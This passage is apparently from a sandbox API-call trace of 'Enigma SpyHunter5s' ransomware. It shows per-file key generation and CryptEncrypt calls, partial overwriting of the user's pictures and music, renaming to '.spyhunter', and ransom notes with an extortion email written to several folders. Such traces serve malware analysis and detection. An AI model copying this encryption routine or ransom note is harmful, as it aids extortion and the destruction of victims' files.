pbBuffer=0x57ee30 | out: pbBuffer=0x57ee30) returned 1 [0147.755] GetProcessHeap () returned 0x2c0000 [0147.755] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0147.755] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57ee28*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57ee28*=0x30) returned 1 [0147.755] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\C3saCamdMQr\\F-3pXTM_wWEA\\AO-ywnYoFhy76t\\q4dNkflf.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\c3sacamdmqr\\f-3pxtm_wwea\\ao-ywnyofhy76t\\q4dnkflf.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0147.755] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\C3saCamdMQr\\F-3pXTM_wWEA\\AO-ywnYoFhy76t\\q4dNkflf.jpg") returned 95 [0147.755] StrStrW (lpFirst="q4dNkflf.jpg", lpSrch=".txt") returned 0x0 [0147.756] GetProcessHeap () returned 0x2c0000 [0147.756] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0147.756] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57edec, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57edec*=0x2800, lpOverlapped=0x0) returned 1 [0147.756] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.756] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57edec, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57edec*=0x2800, lpOverlapped=0x0) returned 1 [0147.757] GetProcessHeap () returned 0x2c0000 [0147.757] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0147.757] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.757] WriteFile (in: hFile=0x178, lpBuffer=0x57ee2c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57edec, lpOverlapped=0x0 | out: lpBuffer=0x57ee2c*, lpNumberOfBytesWritten=0x57edec*=0x4, lpOverlapped=0x0) returned 1 [0147.757] WriteFile (in: hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57edec, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57edec*=0x30, lpOverlapped=0x0) returned 1 [0147.757] CloseHandle (hObject=0x178) returned 1 [0147.757] GetProcessHeap () returned 0x2c0000 [0147.757] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0147.757] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\C3saCamdMQr\\F-3pXTM_wWEA\\AO-ywnYoFhy76t\\q4dNkflf.jpg.spyhunter") returned 105 [0147.757] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\C3saCamdMQr\\F-3pXTM_wWEA\\AO-ywnYoFhy76t\\q4dNkflf.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\c3sacamdmqr\\f-3pxtm_wwea\\ao-ywnyofhy76t\\q4dnkflf.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\C3saCamdMQr\\F-3pXTM_wWEA\\AO-ywnYoFhy76t\\q4dNkflf.jpg.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\c3sacamdmqr\\f-3pxtm_wwea\\ao-ywnyofhy76t\\q4dnkflf.jpg.spyhunter")) returned 1 [0147.758] GetProcessHeap () returned 0x2c0000 [0147.758] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0147.758] GetProcessHeap () returned 0x2c0000 [0147.758] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0147.758] GetProcessHeap () returned 0x2c0000 [0147.758] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f61b40 | out: hHeap=0x2c0000) returned 1 [0147.758] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\C3saCamdMQr\\F-3pXTM_wWEA\\AO-ywnYoFhy76t\\j5EpxrEctZELHVi\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\c3sacamdmqr\\f-3pxtm_wwea\\ao-ywnyofhy76t\\j5epxrectzelhvi\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0147.759] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0147.759] WriteFile (in: hFile=0x178, lpBuffer=0x57ed63*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57ee8c, lpOverlapped=0x0 | out: lpBuffer=0x57ed63*, lpNumberOfBytesWritten=0x57ee8c*=0x127, lpOverlapped=0x0) returned 1 [0147.759] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0147.760] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57ee8c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57ee8c*=0x2ac, lpOverlapped=0x0) returned 1 [0147.760] CloseHandle (hObject=0x178) returned 1 [0147.760] GetProcessHeap () returned 0x2c0000 [0147.760] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fe9130 | out: hHeap=0x2c0000) returned 1 [0147.760] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ee28 | out: pbBuffer=0x57ee28) returned 1 [0147.760] GetProcessHeap () returned 0x2c0000 [0147.760] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0147.760] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57ee20*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57ee20*=0x30) returned 1 [0147.808] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\C3saCamdMQr\\F-3pXTM_wWEA\\AO-ywnYoFhy76t\\j5EpxrEctZELHVi\\n6wy1RZ-t oXjfo.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\c3sacamdmqr\\f-3pxtm_wwea\\ao-ywnyofhy76t\\j5epxrectzelhvi\\n6wy1rz-t oxjfo.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0147.809] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\C3saCamdMQr\\F-3pXTM_wWEA\\AO-ywnYoFhy76t\\j5EpxrEctZELHVi\\n6wy1RZ-t oXjfo.gif") returned 118 [0147.809] StrStrW (lpFirst="n6wy1RZ-t oXjfo.gif", lpSrch=".txt") returned 0x0 [0147.809] GetProcessHeap () returned 0x2c0000 [0147.809] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0147.809] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ede4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57ede4*=0x26de, lpOverlapped=0x0) returned 1 [0147.810] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd922, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.810] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x26de, lpNumberOfBytesWritten=0x57ede4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57ede4*=0x26de, lpOverlapped=0x0) returned 1 [0147.810] GetProcessHeap () returned 0x2c0000 [0147.810] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0147.810] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.810] WriteFile (in: hFile=0x178, lpBuffer=0x57ee24*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ede4, lpOverlapped=0x0 | out: lpBuffer=0x57ee24*, lpNumberOfBytesWritten=0x57ede4*=0x4, lpOverlapped=0x0) returned 1 [0147.810] WriteFile (in: hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ede4, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57ede4*=0x30, lpOverlapped=0x0) returned 1 [0147.810] CloseHandle (hObject=0x178) returned 1 [0147.811] GetProcessHeap () returned 0x2c0000 [0147.811] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0147.811] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\C3saCamdMQr\\F-3pXTM_wWEA\\AO-ywnYoFhy76t\\j5EpxrEctZELHVi\\n6wy1RZ-t oXjfo.gif.spyhunter") returned 128 [0147.811] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\C3saCamdMQr\\F-3pXTM_wWEA\\AO-ywnYoFhy76t\\j5EpxrEctZELHVi\\n6wy1RZ-t oXjfo.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\c3sacamdmqr\\f-3pxtm_wwea\\ao-ywnyofhy76t\\j5epxrectzelhvi\\n6wy1rz-t oxjfo.gif"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\C3saCamdMQr\\F-3pXTM_wWEA\\AO-ywnYoFhy76t\\j5EpxrEctZELHVi\\n6wy1RZ-t oXjfo.gif.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\c3sacamdmqr\\f-3pxtm_wwea\\ao-ywnyofhy76t\\j5epxrectzelhvi\\n6wy1rz-t oxjfo.gif.spyhunter")) returned 1 [0147.811] GetProcessHeap () returned 0x2c0000 [0147.811] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0147.811] GetProcessHeap () returned 0x2c0000 [0147.812] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0147.812] GetProcessHeap () returned 0x2c0000 [0147.812] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fe8ff8 | out: hHeap=0x2c0000) returned 1 [0147.812] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ee28 | out: pbBuffer=0x57ee28) returned 1 [0147.812] GetProcessHeap () returned 0x2c0000 [0147.812] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0147.812] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57ee20*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57ee20*=0x30) returned 1 [0147.812] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000002.regtrans-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0147.812] GetProcessHeap () returned 0x2c0000 [0147.812] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0147.812] GetProcessHeap () returned 0x2c0000 [0147.812] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fbf698 | out: hHeap=0x2c0000) returned 1 [0147.812] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ee20 | out: pbBuffer=0x57ee20) returned 1 [0147.812] GetProcessHeap () returned 0x2c0000 [0147.812] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0147.812] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57ee18*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57ee18*=0x30) returned 1 [0147.813] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000001.regtrans-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0147.813] GetProcessHeap () returned 0x2c0000 [0147.813] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0147.813] GetProcessHeap () returned 0x2c0000 [0147.813] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fbf408 | out: hHeap=0x2c0000) returned 1 [0147.813] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ee20 | out: pbBuffer=0x57ee20) returned 1 [0147.813] GetProcessHeap () returned 0x2c0000 [0147.813] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0147.813] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57ee18*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57ee18*=0x30) returned 1 [0147.813] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tm.blf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0147.813] GetProcessHeap () returned 0x2c0000 [0147.813] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0147.813] GetProcessHeap () returned 0x2c0000 [0147.813] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f46828 | out: hHeap=0x2c0000) returned 1 [0147.814] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ee18 | out: pbBuffer=0x57ee18) returned 1 [0147.814] GetProcessHeap () returned 0x2c0000 [0147.814] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0147.814] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57ee10*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57ee10*=0x30) returned 1 [0147.814] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG2" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat.log2"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0147.814] GetProcessHeap () returned 0x2c0000 [0147.814] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0147.814] GetProcessHeap () returned 0x2c0000 [0147.814] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebfb10 | out: hHeap=0x2c0000) returned 1 [0147.814] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ee18 | out: pbBuffer=0x57ee18) returned 1 [0147.814] GetProcessHeap () returned 0x2c0000 [0147.814] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0147.814] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57ee10*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57ee10*=0x30) returned 1 [0147.814] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat.log1"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0147.815] GetProcessHeap () returned 0x2c0000 [0147.815] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0147.815] GetProcessHeap () returned 0x2c0000 [0147.815] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebfa60 | out: hHeap=0x2c0000) returned 1 [0147.815] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ee10 | out: pbBuffer=0x57ee10) returned 1 [0147.815] GetProcessHeap () returned 0x2c0000 [0147.815] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0147.815] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57ee08*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57ee08*=0x30) returned 1 [0147.815] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0147.815] GetProcessHeap () returned 0x2c0000 [0147.815] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0147.815] GetProcessHeap () returned 0x2c0000 [0147.815] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33e1b8 | out: hHeap=0x2c0000) returned 1 [0147.815] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0147.816] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0147.816] WriteFile (in: hFile=0x178, lpBuffer=0x57ed43*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57ee6c, lpOverlapped=0x0 | out: lpBuffer=0x57ed43*, lpNumberOfBytesWritten=0x57ee6c*=0x127, lpOverlapped=0x0) returned 1 [0147.817] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0147.817] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57ee6c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57ee6c*=0x2ac, lpOverlapped=0x0) returned 1 [0147.817] CloseHandle (hObject=0x178) returned 1 [0147.817] GetProcessHeap () returned 0x2c0000 [0147.817] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2ddb8 | out: hHeap=0x2c0000) returned 1 [0147.817] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ee08 | out: pbBuffer=0x57ee08) returned 1 [0147.817] GetProcessHeap () returned 0x2c0000 [0147.817] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0147.817] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57ee00*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57ee00*=0x30) returned 1 [0147.817] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZB1k9ERMq5T.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zb1k9ermq5t.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0147.818] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZB1k9ERMq5T.m4a") returned 55 [0147.818] StrStrW (lpFirst="ZB1k9ERMq5T.m4a", lpSrch=".txt") returned 0x0 [0147.818] GetProcessHeap () returned 0x2c0000 [0147.818] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0147.818] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57edc4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57edc4*=0x2800, lpOverlapped=0x0) returned 1 [0147.819] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.819] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57edc4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57edc4*=0x2800, lpOverlapped=0x0) returned 1 [0147.819] GetProcessHeap () returned 0x2c0000 [0147.819] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0147.819] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.819] WriteFile (in: hFile=0x178, lpBuffer=0x57ee04*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57edc4, lpOverlapped=0x0 | out: lpBuffer=0x57ee04*, lpNumberOfBytesWritten=0x57edc4*=0x4, lpOverlapped=0x0) returned 1 [0147.819] WriteFile (in: hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57edc4, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57edc4*=0x30, lpOverlapped=0x0) returned 1 [0147.819] CloseHandle (hObject=0x178) returned 1 [0147.819] GetProcessHeap () returned 0x2c0000 [0147.820] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0147.820] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZB1k9ERMq5T.m4a.spyhunter") returned 65 [0147.820] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZB1k9ERMq5T.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zb1k9ermq5t.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZB1k9ERMq5T.m4a.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zb1k9ermq5t.m4a.spyhunter")) returned 1 [0147.820] GetProcessHeap () returned 0x2c0000 [0147.820] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 